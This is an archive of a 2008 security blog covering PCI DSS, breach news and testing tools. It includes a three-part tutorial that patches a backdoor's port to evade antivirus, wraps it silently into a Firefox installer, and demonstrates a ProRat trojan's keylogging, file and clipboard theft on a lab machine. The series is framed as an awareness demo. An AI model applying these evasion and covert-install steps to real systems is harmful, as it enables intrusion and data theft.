Tuesday, October 7, 2008

The security ninja has left the building

Well as usual things have happened much sooner than I had planned!

The new blog and forum went live over the weekend and now the new Security Ninja website is live. I'm happy with the way it looks at the moment and work is ongoing but from today onwards I will not be posting to this blog anymore.

The Security Ninja website can be found here.

I look forward to seeing everyone on the new site!

Dave

Friday, October 3, 2008

News from the ninja

Hi everyone,

I just wanted to keep everyone up to date with what is going on with Security Ninja. I've been crazy busy with my company being close to our annual PCI audit but of more interest to you guys is the changes coming to Security Ninja.

As I have been working away on the various tutorials I'm writing I think the blog format isn't quite right to host everything I plan to produce. I love my blog and its going to stay around but Security Ninja is expanding to provide more than just a blog!

I have a few ideas which I plan to put on the new site, for example I would like a wiki for application security, a security forum, a whitepapers section and a tutorial section. On top of that lot I will of course be keeping the blog going!

The new blog can be found here.

I plan on bringing the forum online over the weekend and the rest of the site over the next month.

If anyone has ideas for the new site then give me a shout on the blog or my cool new email address - securityninja at securityninja.co.uk :-)

Dave

Thursday, October 2, 2008

PCI version 1.2 released

Everyone who reads my blog and has spoken to me knows my feelings on the lack of real changes in the new version of the PCI DSS standard, those feelings aside I feel people should read the new version of the standard available here.

For those of you who feel the standard is sufficient or don't understand my issues with the standard I have listed three examples below that I feel the standard should address:

Virtualisation

Almost every company seems to be implementing virtualisation technologies within their infrastructure without understanding the new security issues this potentially raises. More and more researchers are attacking virtualisation technologies which means more and more vulnerabilities will be found (for example, Blackhat USA07 had 2 presentations of virtualisation security issues compared to 20 at Blackhat USA08).

I think the standard needed to include specific requirements for this technology.

Cloud Computing

Maybe not such a hot technology right now but it will continue to rise in popularity because of the low cost of ownership this technology can deliver. Cloud computing makes even virtualisation look expensive!

In the current economic climate companies will aim to save as much money as possible and cloud computing will deliver serious savings. So what is my problem? With cloud computing you don't actually know where your data is, well you know its in the cloud......

I can't see how cloud computing can be PCI DSS compliant but companies who need to be complaint may just go down this route. I get the feeling that before the next version of the standard is released this may become an issue the council needs to address.

Secure Application Development

Considering secure application development is my niche I will always look for more on this particular topic. I have always had a problem with requirement 6.6 and I still do. I'm not really keen on the idea of using only a WAF (Web Application Firewall) instead of a really good secure development process. I don't care what the marketing departments of the WAF vendors say you cannot prevent attacks such as CSRF (Cross Site Request Forgery) with these devices.

Let me know what you think!

Dave

Thursday, September 25, 2008

My (IN)SECURE Magazine Article

Hi everybody,

The September edition of (IN)SECURE Magazine has been published and contains my article on Secure Web Application Development.

You can download the magazine here.

As always feedback is more than welcome!

My Burp Suite tutorial is still work in progress, I have had a few requests to include more content than I originally planned so hold tight everyone!

Dave

Saturday, September 13, 2008

Burp Suite Tutorial

Just a quick note to say the tutorial for Burp Suite is in progress.

I have been in contact with Portswigger who is the developer behind the Burp Suite so the tutorial will have his input as well as mine.

Dave

Tuesday, September 9, 2008

SCADA system vulnerability and exploit code

For those of you who don't know what a SCADA system is think core backbone systems for a country or countries. Power grids, water systems and defense systems to name just a few. A brief overview can be found here.

Often these systems have operated on very old (Win 3.x and OS2) systems which people are to scared to update. The defense has always been "oh we don't connect this core systems to the internet so we are fine". That isn't always the case anymore, more and more SCADA systems are getting internet access whether it is authorised or not. A penetration tester friend of mine recently told me how he was auditing a SCADA infrastructure that had 5 connections to the internet that had never been authorised. Normally I wouldn't have paid much attention but these are systems which control almost everything we use and rely upon delay, cyber warfare anyone?

So why should I write this post now? Well a recent vulnerability discovered by Core Technologies has had exploit code written for it. This exploit code has been made available as a module for Metasploit for anyone to download. I do not encourage any kind of unlawful hacking but surely someone will take advantage of this and take something very important down?

I won't reproduce someone else's work so here is the paper written by the exploit writer Kevin Finisterre.

As always if you have any questions or comments then fire away.

Dave

A few updates....

A bit apology for the amount time that has elapsed since my last post. Moving house took up more of my time than I had planned!!

I'm moved and settled so back to business as usual from today on.

Whilst I have been away I have agreed to become a columnist with bloginfosec and my first article should be posted in the next couple of weeks. I recommend anyone who reads this blog to also take a look at the content over at bloginfosec.

Secondly my article I have written for (in)secure magazine which discusses secure web application development and integrating security into a dvelopment lifecycle will be published this month. You can subscribe to the magazine for free at net-security.

Last but not least on the updates. OWASP have announced that an EU Summit will be held in Portugal this November and will be discussing many important issues! More information can be found here. I will be going along to the summit so if any readers on going along then drop me a line and we can hook up.

I thought I would let you all know what content I plan to add to the blog in the coming weeks. Some of it is based on my own interests and some of it is based on the search queries that people are using to land of my little corner of the web!

Burp Suite Tutorial

Grendel Scan Tutorial

Metasploit Tutorial

Samurai Live CD Review

Backtrack 3 Review

SQL Ninja Tutorial

Those will be the more technical posts that are coming up in the short term. I will be posting my usual comments on the news and security vulnerabilities.

Dave

Monday, August 25, 2008

Blackhat USA 08

The presentation materials are now available for the Blackhat USA 2008 conference, go and read them all :-)

Sorry for the lack of posts, I'm moving house in 2 days so its all very hectic at the moment!

Dave

Tuesday, August 19, 2008

PCI DSS version 1.2

I have come across a document from the PCI DSS Council today which has a summary of the changes that will be included in the next version of the standard.

I will reserve my full opinion on the changes until I see the final version of the standard. I will say I'm a bit disappointed if the document lists all of the changes to the standard as it doesn't even update requirement 6.5 to the latest OWASP top ten...

I will post more when the final version of the standard is released.

Thursday, August 14, 2008

Application Security Testing Tools

I have been asked a few times recently to tell people what tools I use when I'm testing web applications for security issues.

I always find that a mixture of tools can be used to find potential security issues in applications but to exploit these issues it always seems to be a manual effort. I don't mind that, I get a good feeling when I hack things!

I will list the tools I use along with a short description, I'm not writing this post as a tutorial - if anyone wants tutorials then let me know and I will see what I can do.

My favourite tool would be the Burp Suite from Portswigger. We have recently purchased a site license at work - I think that says a lot for this tool. Burp Suite offers many different modules that can help you test application security. I like the intruder module the most, this allows me to input the strings I would use in manual tests very quickly and in a few different ways. My test inputs file is nearly 400 different inputs so the intruder module is a lifesaver. The Burp Suite is available as a free or commercial tool, I recommend that anyone interested in web application security testing grabs a copy and has a play with it.

The Burp Suite can also be extended using the IBurpExtender, if any developers reading this want to collaborate on a project then drop me a line. I have a few ideas that I would love to implement using the Burp Extender.

I have recently started playing with the Exploit Me Firefox plugins and I have been impressed by them. I have put SQL Inject me and XSS me into my testing tool box. The plugins allow you to "point and click" test web applications for XSS and SQL Injection issues. They are quick and efficient and I would recommend them to anyone wanting to test for these issues.

I have recently started to try some fuzz testing tools when I have been testing web applications. This approach has found a lot of bugs in high profile software in the past so I felt it was worth a try.

I had started using Spike Proxy for fuzzing but if I'm honest I'm not that impressed with the tool. I felt the initial character set that is hardcoded into the tool wasn't as big as I would like. I extended this significantly but I'm still not likely to stick with this tool. I wanted the fuzzer to put random data into fields with random lengths and this tool didn't deliver that for me. Perhaps I'm using it incorrectly, if so drop me a line and enlighten me :-)

So to fulfill my desire for a fuzzing tool I have begun playing with Jmeter for this purpose. I think if I write some Java which has a predefined character set (could even pull from a "random" source - /dev/random?) and an upper and lower length for the input I can use BeanShell with Jmeter and input this fuzz type data into fields which I submit to the web application. I can't take all of the credit for that idea, if the person who helped with this idea is reading this now then thank you very much! That idea is still very much in the "does it actually work?" stage so I will let you all know how it goes.

Thats my main set of testing tools at the moment but I'm always playing with new things. I have a few tools listed below that I think are going to be squeezing into my testing tool box soon (not all of these are new tools):

Grendel-Scan

Nikto

Wikto

Try them and find out what works for you.

Dave

Up in the clouds......

With all the discussion of cloud computing recently I have decided to give it a go. I'm going to sign up with the Amazon cloud service.

Since I created this blog I'm finding I need bigger and better labs to test out things like the Dan Kaminsky DNS flaw, Evilgrade and a multitude of reverse engineering tasks. I have decided that doing all of this up in the Amazon cloud gives me a huge amount of computing power for a very small price.

I'm going to get myself set up in the next few days - expect some good lab work to appear on the blog in the coming months!

Dave

Monday, August 11, 2008

Security/Hacking conferences

With all the talk of Blackhat USA and Defcon at the moment it makes me wish I would have gone along! I have a lot of friends over in Las Vegas at the moment telling me about the fun they are having. I look forward to reading the presentations from the conferences.

Next year I will be going! I will also being making my usual journey to Blackhat Europe in 2009. It seems like a long way off but Blackhat Europe will be hosted in Amsterdam as usual. It will run from April 14th through to the 17th next year. Details will be posted on this page.

I also plan on visiting the Chaos Communication Congress in December this year, the Chaos Congress will be held on the traditional days of 27th - 30th December. I think I really need to pick my time carefully when I tell my girlfriend I plan on going! More details can be found here.

I will post more about Blackhat nearer the time but if anyone else is planning on going to CCC give me a shout.

Dave

Monday, July 28, 2008

An apple a day.......

Should keep the doctor away. Useless its an OS X install acting as a DNS server, in which case this apple a day will get you owned.

Incase you have been living on the moon and have missed the huge amounts of news stories about the serious issue discovered in every DNS implementation please read this.

It appears that Apple are one of the few major vendors who have not released a patch and according to Heise Security they haven't even issued any security alerts. I'm not an anti Apple person, I own a Macbook and an Ipod Touch but over the years they haven't been great at security and patching. Steve Jobs might be right about Microsoft lacking taste and design ideas but they sure do kick Apple's ass when it comes to patching and patch scheduling.

This DNS issue has been bubbling for a couple of weeks now until Halvar Flake figured out the problem. DYOR (Do Your Own Research) on the whole story but the issue has got much worse with the release of a metasploit module and Evilgrade which exploits this issue.

As soon as I get the chance I will give a demo of either the metasploit modules or Evilgrade, probably Evilgrade as I like the look of that!

Dave

76% of US Banking websites insecure

I came across a study today written by Laura Falk, Atul Prakash and Kevin Borders from the University of Michigan which explains that of the 214 US banking sites reviewed 76% have security holes.

The report focuses on security issues that have occurred because of poor design decisions in the development of the banking sites. I like this approach because it demonstrates that security compromises don't just occur through obscure or fancy attacks.

Some of the issues highlighted are things that I would suggest are obvious design flaws such as beginning a logon session from an HTTP page.

I would suggest that anyone with an interest in secure web application development should have a read of this report. My article in the next edition of Insecure Magazine will give you tips on how to avoid these types of design issues.

Dave

Tuesday, July 15, 2008

Views on the news

I have come across a few news stories I wanted to share with you all today, so instead of having multiple posts I thought I would address them all here.

The first news story I nearly didn't read but I'm glad I did. Moodle is a course management portal used by universities and the like across the world. The story explained how the portal has two vulnerabilities, XSS (Cross Site Scripting,not really a "wow") but also a CSRF (Cross Site Request Forgery). The CSRF really interested me and I now have something to point my colleagues to who have listened to me talking about this issue for a while now.

I won't explain CSRF here (details can be found here) but the attack itself tricked users into clicking on a link which sent an edit profile request on their behalf. This leads to a compromise of the users account.

The second story explains how 3/4 UK companies have banned IM within their infrastructure. In the story it states that only 88% of the IT directors surveyed felt IM posed a security risk, oh dear. Personally I would ban public IM (MSN, Yahoo etc) for all users, in fact I would go one step further and remove web access completely for certain business units. If a business unit has access to sensitive data then, in my opinion, the systems in that business unit should not have web access. The sensitive data could be credit card data, Intellectual Property such as source code - anything sensitive and of high value to the business really.

I'd like to hear the opinions of other people on this.

Just one more to go, a more technical story.

The last one is from Sans ISC, have a read and let me know what you think.

Dave

The dataloss database

I often struggled to find the statistics I required for presentations on data breaches until I found attrition.org

I liked attrition, but I love what it has evolved into! I got an email on full disclosure mailing list today announcing its change to the dataloss database. The Open Security Foundation will be running the datalossDB and I for one look forward to using it going forward!

Basically it is a central DB for all public data breaches for the past 8 years there are many ways to search the data and monthly and annual reports can can be viewed by any one.

I have to say the guys at OSF have done a great job with this!

Dave

Thursday, July 10, 2008

2600, first the magazine now the book!

2600 magazine has been around since 1984 and I always look forward to my copy being delivered. I was happy to read that they are releasing a book with all of the best bits from 1984 through to 2008.

I think it will be a great read, I bet the articles in the early editions still talked about topics such as blueboxing through to the early/mid nineties when the internet exploded into the beast we know today. I can't wait!

More details can be found here: 2600 book

And yes, I have pre-ordered mine ;-)

Dave

Tuesday, July 8, 2008

Part 3 - using the wrapped ProRat Trojan

Well finally I have managed to get part 3 written. My initial intention was to use the modified tini.exe that we installed in part two but I changed my mind. Part one and two are still fully relevant, you need to have read part two to understand part 3 fully.

I decided to use a a trojan that has far more "eye candy" than tini and netcat. I'm using a trojan called prorat which I used to tinker about with in the past. I think it will really highlight why part one and part two were important to know.

First, as usual, the actors:


I have used two Windows XP virtual machines (safety first kids) for this demonstration, both the victim and attack hosts are shown below:



I have downloaded and openend the prorat command software on the attacker machine as shown below:


The first thing I need to do is to create the server. The server in prorat is actually the piece of software you wish to install on the victims machine. I chose a random port for my server, port 8668. I have included a few screenshots below showing the wide range of options available to the attacker when he is creating the server:








Some of those options, more so in the first image are pretty serious attacker options. For example disable the firewall and anti virus......

I wrapped the prorat server up with the firefox installer (see part two of this series for more information) and installed this on the victims machine. I have included before and after netstat -na outputs below:



I connect to the server through the prorat command console:


I think its time for some fun, lets have a play with some of the tools available to us. As you can see the command console offers me lots of tools to extract information or even do more damage to the victim. I have just selected a few of these to demonstrate in this post.

I have included screen shots of a view of these tools in action, firstly taking screenshots of the victims desktop:


Viewing the applications the victim is running:


Viewing the web history:


I just have three more examples I would like to show to you in this post. Firstly copying the victims clipboard. I have entered some text in notepad on the victims computers:


And I have accessed this through the command console:


Second, stealing files from the victims machine. The victim has a file called mypasswordsfile.txt:


and I have copied this to the command console:


Just one more to show, the keylogger. Without needing any prompting from me the prorat server has been sending all of keystrokes back to the command console as shown below:


Well that is all really, I think we all can now see how easy it can be to get malicious and powerful software onto an unsuspecting victims machine.

Don't have nightmares, the next technical post will be explaining how to steal data and hiding it covertly with tcp packets.

Dave

PS - all stunts are performed by highly trained security ninjas, do not attempt to perform these stunts in your own home.

Monday, July 7, 2008

Exploit-me tools

I have been using a few new tools recently to help automate my XSS and SQL injection testing and I thought I would share them with you.

My normal approach involved manual work along with the Burp Suite (using the intruder function) with a list of inputs loaded in. I came across the Exploit-me tools from Security Compass and I thought I would tell you guys about them.

I won't talk to much about how to use the tools, I think installing them and having a play will tell you all you need to know. The link above to the Security Compass website does have some FAQ's/usage guides along with a presentation given at the SecTor conference. XSS-Me comes pre-loaded with RSnake's XSS cheat sheet inputs, these can be expanded with strings from your own brain or from many web sources. SQL inject ME is similar in that it comes pre-loaded with some strings, again this list can be extended. Lastly the Access-Me tool aims to exploit access control flaws within an application.

Have a play with the tools and let me know what you think.

Dave

(in)secure magazine article

Hi everyone,

I will be writing an article for the next edition of (in)secure magazine on secure web application development.

I plan on explaining why we need to develop securely, what kind of approaches to development can be taken to ensure secure development takes place and then general tips based on my own experience.

When the next edition is released I will post a link to it here.

Dave

I'm back!

I flew back to Ireland this morning from the British Grand Prix, as a fan of Ferrari it turned out to be a disappointing race for me. Arguably we haven't been as poor from a team perspective since the pre Schumacher days in the 80's and early 90's. Hopefully things will be better when I fly to the home of Ferrari F1 racing in September.

I will be working on post 3 in the series over the next day or two so watch out for that. Because of the comment by Niall last week about Anti Virus products I want to take a different approach to the one I had originally planned so stay tuned!

Wednesday, July 2, 2008

Citibank ATM's hacked

I came across an interesting story today which explain how the Citbank ATM's in over 5,000 7Eleven stores have been hacked.

It is estimated that the hackers have stolen around $2million from this hack. That is of course no small amount of cash but thats not what caught my attention. All that's known is the hackers broke into the ATM network through a server at a third-party processor, which means they probably didn't have to touch the ATMs at all to steal the pin numbers. The pin numbers were passed in the clear from the ATM machine through to the backend system. This is about all the information that has been made public so far, as soon I hear anymore I will post it here.

This is clearly a new way to steal the pin numbers and would show absolutely no signs to the ATM user. Previously security professionals would inform users not to enter their pin into links followed through phishing emails. We would also tell people about false fronts on ATM's designed to steal your data but this is completely different. The end user would have had no idea that this was going on.

More and more ATM's are running on the Windows Operating system and this appears to be a range of versions from Windows 98 through to Windows XP. I have an example on an ATM running Windows NT below:


And a second image I like is shown below, its a Russian ATM running a pirated version of Windows XP:


Dave

Tuesday, July 1, 2008

Wrapping a backdoor with a genuine installer

Well I have been able to get this posted much quicker than I thought. In short I will be using dave.exe from post 1 to wrap it up with the genuine installer for Firefox 3.0.

This will install Firefox and also my backdoor silently on the machine.

Here we go, the actors:


Once I have launched Elitewrap I have to define the output filename. This is the name of the wrapped .exe


Once this has been defined you have to select the operation you want Elitewrap to perform.


The readme file lists all the options with explanations but I will be using operation 3. This will install my backdoor silently whilst the Firefox installer runs in the foreground.

And so to wrap the exes, nothing really complicated to it as you can see below:


And here is the output:


Before I run this executable I have run the netstat -na command to show the backdoor isn't already running (it will be on port 39846):


So I double click the exe and here is the output (including an update netstat):




So we can see already that the backdoor is listening and we haven't even installed Firefox. So even if we were to cancel the installation its too late.

We continued the installation and allowed it to finish:


And the final result is shown below:


Firefox installed without any hint of a problem and my backdoor is waiting for me to connect.

I hope that this post has been informative, contact me or leave a comment if you have any questions.

Update: based on Niall's comment I have uploaded the wrapped firefox.exe to Virus Total and the results are shown below:


For part three of this post I will be using some a bit more industrial that dave.exe. All will be revealed soon!

Dave

Monday, June 30, 2008

Part two nearly here.....

With a bit of my OWASP work complete I thought I would put part two of this post up. I decided to video the whole thing, it was my first time and I have had nothing but trouble with it. The video was nearly 100mb so it took ages to upload and when it finally did the quality was terrible, it looked great locally.

I will just post up screenshots tomorrow like I did for the first bit of the post. I will sort this out tomorrow night, so only one more day to wait. If I get the video uploaded and looking good I will add that in.

If I had more time I'd get it sorted properly but I fly out to the British Grand Prix on Thursday morning and I'd like to get it posted before I depart.

Dave

Friday, June 27, 2008

Bypass modern anti virus with an 8 year old backdoor

This is the first of a 3 part blog entry, well blog entry/warning/tutorial - pick which you think fits this best. As soon as people find out I work in IT Security normally the first question I'm asked is which is the best Anti Virus product to use? Normally I just say one of the big providers, F-Secure, Symantec etc but I do also state that they aren't a silver bullet.

What I'm going to do in this 3 part blog is first download tini.exe which is a backdoor roughly 8 years old and submit it to Virus Total. This will be scanned by 33 different anti virus products and I will show the results. Then the fun bit, I will modify just the port that tini.exe listens on and its name then see how many report it as a backdoor!

Secondly I will show you how to wrap this backdoor into any application you want and have it install silently along with the real application. The third step will be a demonstration of a second machine connecting to this backdoor.

First download the tini installer. I will submit the default Tini.exe backdoor to virus total and see how many of the modern anti virus companies will detect this old backdoor.



All of the products have figured out that it is some kind of backdoor/trojan.

So now to crack tini open with a hex editor and find the default port value, 7777 in this case:


Now I have picked a random port of 39846 (9ba6) and I will edit the backdoor as shown below:


I saved the modified version as dave.exe and I will re-submit this Virus Total. The results are shown below:



You can see that only 21 of the products now reported this file as being malicious. So by just changing the listening port and the name of the backdoor 21/33 products detected this 8 year old backdoor (first scan was 32/33). It is hardly inspiring reading is it?

Part two of this post will show you how to wrap this modified backdoor with a genuine application to install it in stealth on the victims machine.

Please be patient for post two, I have commitments to meet for the OWASP Code Review guide for the next few days before I can put part two up.

Sunday, June 22, 2008

Interview with the developers of Backtrack

I have been listening to episode 112 of the PaulDotCom podcast (PaulDotCom) and it contains a fantastic interview with the guys behind the BackTrack distribution.

I highly recommend this podcast to existing and new BackTrack users alike.

The guys talk about where the distribution came from, some of the problems they have faced, some of the tools in the latest version and plans for the future.

The BackTrack distribution can be found here: BackTrack

Dave

Friday, June 20, 2008

Virgin Media data breach

What is it with 2008 and companies losing data on CD's?

The latest company to lose data this way is Virgin Media, they have lost a CD which was un-encrypted and contained the bank account details, names and addresses of 3000 customers.

More information can be found here: Virgin Media data loss

What more can I say, its Friday night - maybe I will come back and add a rant to this post tomorrow :-)

Dave

Monday, June 16, 2008

Secure Development - preventing Cross Site Scripting

Hi everyone, I have included a Google Docs reader below for a paper I have written on Cross Site Scripting. The paper discusses the three types of Cross Site Scripting attacks as well as code examples and the associated fix.

The paper can be viewed here:

Preventing Cross Site Scripting

The formatting has been messed up a bit by Google Docs but I hope it makes sense to everyone.

Sunday, June 15, 2008

PCI 6.6 mandatory compliance date looming

When I first read PCI DSS v1.1 requirement 6.6 caught my eye for two reasons. I could see the potential security benefits but also the extra work I would have to do!

Requirement 6.6 is shown below:

Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:

• Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security
• Installing an application layer firewall in front of web-facing applications.

Note: This method is considered a best practice until June 30, 2008, after which it becomes a requirement.


Wow, all custom code externally reviewed - time to save up the pennies to pay for that! A lot of the community were scratching their heads trying to figure out whether this actually means having every line of custom code reviewed, even for a relatively small company we were a bit worried about the cost. Fortunately the PCI Council released a clarification document earlier this year detailing that a company could meet 6.6 by one of the following approaches:

"The application code review option does not necessarily require a manual review of source code.

Keeping in mind that the objective of Requirement 6.6 is to prevent exploitation of common vulnerabilities (such as those listed in Requirement 6.5), several possible solutions may be considered.

They are dynamic and pro-active, requiring the specific initiation of a manual or automated process. Properly implemented, one or more of these four alternatives could meet the intent of Option 1 and provide the minimum level of protection against common web application threats:

1. Manual review of application source code
2. Proper use of automated application source code analyzer (scanning) tools
3. Manual web application security vulnerability assessment
4. Proper use of automated web application security vulnerability assessment (scanning) tools"


We felt that our current approach towards secure application development and code reviews met the intent of the first option in requirement 6.6. We have had an external company who are specialist in auditing and application security to review (and produce a report on) our process.

I would love to know what kind of approach others have taken to satisfy requirement 6.6.

Remember folks, it becomes mandatory in 15 days so act fast!

Even more documents lost....

Following on from my post last week which discussed the loss of Top Secret government documents a second breach has been hitting the headlines.

I was amazed that these kind of documents were left on a train once but to happen twice is beyond belief. Several of the statements made by government officials/in news reports did grab my attention, firstly:

"His work reportedly involves writing and contributing to intelligence and security assessments, and he has the authority to take secret documents out of the Cabinet Office - so long as strict procedures are observed."

So the government actually allows Top Secret (National Security documents) to be printed and taken off its premises. As a Security professional my first reaction was one of surprise until you consider the major security blunders by the UK government in the past 12 months.

Secondly, a comment made by Keith Vaz, Chairman of the Home Affairs Select Committee:

"no official no matter how senior, should be allowed to take classified or confidential documents outside their offices for whatever reason."

That seems a good enough start in my opinion. But this really does come back to very last point I made in my original post last week about printed data.

It is one of my biggest professional fears, how do I know people aren't printing sensitive data off and stuffing it into their pockets? As a financial services company we get emails every week from individuals and banks (yes, banks) which contain un-encrypted sensitive data. Fortunately we have well defined procedures and skilled staff to respond correctly to these emails. But what if we didn't?

In terms of technical controls we can control the risk of theft around this data but if it were printed then all bets are off. A user could just print the email, if we prevent printing then could do a screen print, they could even write it down and away they go. In this day and age of mobile phones with high resolution cameras what is to stop people just taking a picture of the data and taking it that way?

When you think of it like this you may feel a bit of sympathy for the government, but they have the budgets and the ability to hire the top talent to prevent these breaches.

Wednesday, June 11, 2008

Security, is it really that hard?

I read and hear about security breaches almost everyday and I always ask myself the same question, "is security really that hard?".

Today I have read two articles on the BBC website, one (BBC Article 1) is even more credit card numbers lost and the second (BBC Article 2) is more UK government confidential documents lost.

Cotton Traders have lost 38,000 credit card numbers through their website. No technical details of the breach have been given but its likely to be a SQL Injection attack. The article on the BBC doesn't give much information away. What it does give away is false information about the TK Maxx data breach in 2007. The article falsely stated the TK Maxx breach occured through their website.

TK Maxx (more precisely TJX) didn't loose their card numbers through their website. The breach occurred because of someone noticing that the TK Maxx stores used WEP to protect their internal POS networks. Through war driving they cracked the WEP (not a highly technical hack) and went onto take close to 100 million card numbers over 18 months. For such a big news company I would have expected a more accurate report from the BBC.

Back to the original point, the Cotton Traders breach. Many sites are vulnerable to (again this is based on my assumption) SQL Injection so only half a scowl for them on that. But cleartext card data, thats not really forgivable. If I were investigating the breach my two main questions would be 1) Did you need to store that data and 2) Why didn't you securely store it (i.e. encryption)? I'm sure we will never publicly know these answers.

My last point on Cotton Traders is the breach occurred in January, 6 months ago. The sooner we see more laws like California's SB 1386 the better! The public should be made aware sooner of such breaches, just think how many are probably going un-reported.

The second article focuses on the fact that the UK government has lost more information. This time a government official has left printed copies of Top Secret documents on Al Qaeda and the war in Iraq on a train. A police investigation is being conducted and I'd suggest that some poor employee that may not have known better will be receiving their P45 soon. I could write all night about the potential problems that have occurred to cause this loss of data but I won't!

At a recent Data Privacy seminar we were all unanimous in our fear of printed data. We can have all the latest and greatest firewalls, IPS/IDS, encryption etc but once its on paper what can you do?

Dave

Monday, June 9, 2008

How safe is hackersafe?

A lot of websites now have the hackersafe logo displayed on their website. I've always wondered what this actually means for a website, what do they check etc.....

Well today I got a phishing email, I followed the link to see who had been exploited this time. The phishing site was being hosted a few directories deep on the webserver so I backed up to the homepage (away from the Phishing site to the "real" site) to be greeted by the lovely hackersafe logo. The hackersafe logo proudly proclaimed that the site was hackersafe, certified today!

Obviously the site isn't hackersafe. So what does this mean, is this a security company providing an inferior service spreading FUD and providing no real security? My opinion would be maybe, potentially there is a need for this kind of service but in my opinion hackersafe does not provide what its clients believe it does.

It is worth noting that in October 2007 McAfee payed $51M (potentially rising to $75M) for hackersafe. The service being provided and those figures remind me of one thing, "This time next year, we'll be millionaires!" (Delboy, Only Fools and Horses).

Friday, June 6, 2008

My public security talks

This year has been good for me so far for public talking. I have been lucky enough to be invited to speak at the Irish Web Technology Conference (IWTC 2008) and an OWASP Ireland Chapter Meeting.

I had a lot of fun doing these talks, IWTC was based in the Cineworld cinema in Dublin. It was a very strange feeling to actually be presenting my work on the big cinema screen where only weeks earlier I was watching Shrek!

The IWTC talk was focused on a high level discussion of the current threats application developers need to protect against in 2008. I also discussed how to write code to protect against these threats. I finished off the talk with an explanation of the application security processes I have implemented at Realex Payments.

The talk can be viewed here (Google Docs has broke some of it, contact me for the original):



In April Eoin Keary (OWASP Ireland Chapter Lead) invited me to talk about Application Security and the PCI DSS. The talk focused on how PCI DSS would affect an application developer along with an overall opinion on PCI DSS and how it applies to application security. I presented this talk at Ernst and Young in Dublin.

The talk can be viewed here:



All feedback, good or bad, is welcome!

My first blog!

After reading so much about blogging I thought it was about time I started!

I was inspired to start my blog after my friend Martin mentioned me on his blog (http://brigomp.blogspot.com/). As the blog is in Spanish all I understood was my own name, fortunately it was all good.